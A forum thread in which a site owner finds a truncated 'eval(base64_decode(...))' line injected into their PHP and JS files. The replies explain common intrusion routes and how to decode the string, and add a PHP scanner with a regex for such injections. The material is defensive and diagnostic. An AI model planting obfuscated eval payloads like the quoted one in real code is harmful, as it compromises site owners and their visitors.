php decode hacked my sites. Is it Virus

hapizi84 | #1 | 14 Days Ago
I found a problem on my site, and when I compared the files on the server with my local files I found that every page (*.js or *.php) has this line in it:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC
or a JavaScript line.

So I knew that my site had been hacked.
So:
1 - I want to know how to prevent anyone from hacking my site?
I did htmlspecialcharacter($_POST['name']) on every text field or textarea when posting or getting it.

Is this true? And can it help me?
2 - How did anyone hack my site?
3 - How can I know what this code means?

Help me please.
Atli | #2 | 14 Days Ago
Hey.

> 1 - I want to know how to prevent anyone from hacking my site?
> I did htmlspecialcharacter($_POST['name']) on every text field or textarea when posting or getting it.
>
> Is this true? And can it help me?

The htmlspecialchars function is meant to be used when printing unsafe data to an HTML page.
It doesn't protect you if you use the data for other things, such as SQL queries or shell scripts.

> 2 - How did anyone hack my site?
Hard to tell. Especially since we know absolutely nothing about your website.

Most likely suspects:
  • Your FTP info was stolen from a PC you were working on.
    Developers often use FTP applications that store login details for them so they don't have to type it in every single time.
    Some viruses target such applications, giving the attacker access to your FTP server.
    (Please note that these sorts of viruses are designed to be invisible. And yes, you can have one. Doesn't matter how protected you think you are.)
  • Dynamic includes/SQL/eval/shell scripts. All of these can be used to gain unauthorized access to your server if they are created using unsafe data. A common newbie mistake is to add un-escaped user input into SQL queries, which allows a hacker to alter the command via your own web-form.
    (See SQL Injection)
  • Broken file upload scripts, which allow malicious users to upload scripts onto your site. Always take care to limit file uploads to known types, or a malicious user could just upload a PHP file and execute it via a normal web-request.

> 3 - How can I know what this code means?

    <?php
    // Print the decoded string instead of passing it to eval().
    echo base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC');
    ?>
This just prints the command that the eval() call you posted is supposed to execute.
Please do not ask for help in a PM. Use the forums.
And use [code] tags!
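
Building on the reply's point that the string can be decoded and read instead of run, here is an added example (not code from the thread or its posters) that lists every `eval(base64_decode('...'))` line in a site's PHP files and prints what each one would have executed, without calling `eval()`. The names `INJECTION_RE`, `find_injections` and `scan_tree` and the sample input are assumptions made for illustration.

```php
<?php
// Added example; INJECTION_RE, find_injections and scan_tree are hypothetical names.
// The closing quote is not required, so a cut-short payload still matches.
const INJECTION_RE = '~eval\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+/=]*)~i';

/** Return the line number and decoded payload of every match; nothing is executed. */
function find_injections(string $source): array
{
    $hits = [];
    preg_match_all(INJECTION_RE, $source, $m, PREG_SET_ORDER | PREG_OFFSET_CAPTURE);
    foreach ($m as $match) {
        [$payload, $offset] = $match[1];
        $hits[] = [
            'line'    => substr_count($source, "\n", 0, $offset) + 1,
            // Non-strict decoding tolerates a truncated string; control and
            // non-ASCII bytes are escaped so the result is safe to print.
            'decoded' => addcslashes((string) base64_decode($payload), "\0..\37\177..\377"),
        ];
    }
    return $hits;
}

/** Scan every *.php file under $root and return path => hits for affected files. */
function scan_tree(string $root): array
{
    $report = [];
    $dir = new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS);
    foreach (new RecursiveIteratorIterator($dir) as $file) {
        if ($file->isFile() && strtolower($file->getExtension()) === 'php') {
            $hits = find_injections((string) file_get_contents($file->getPathname()));
            if ($hits) {
                $report[$file->getPathname()] = $hits;
            }
        }
    }
    return $report;
}

// Constructed sample: line 2 carries the truncated fragment quoted in the thread,
// line 3 a harmless payload encoded here.
$sample = "<?php\n/**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC\n"
    . "eval(base64_decode('" . base64_encode('echo "constructed";') . "'));\n";
// Given a directory argument, scan it; otherwise report on the sample.
$report = isset($argv[1]) ? scan_tree($argv[1]) : ['sample' => find_injections($sample)];
foreach ($report as $path => $hits) {
    foreach ($hits as $hit) {
        printf("%s:%d  %s\n", $path, $hit['line'], $hit['decoded']);
    }
}
```

Run it from the command line with the site's directory as the only argument, or with no argument to see the report for the constructed sample. It matches only the PHP pattern, because the JavaScript line mentioned in the question is not shown in the thread.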
Tags
code, hack, php, virus


©2003 - 2009 DaniWeb® LLC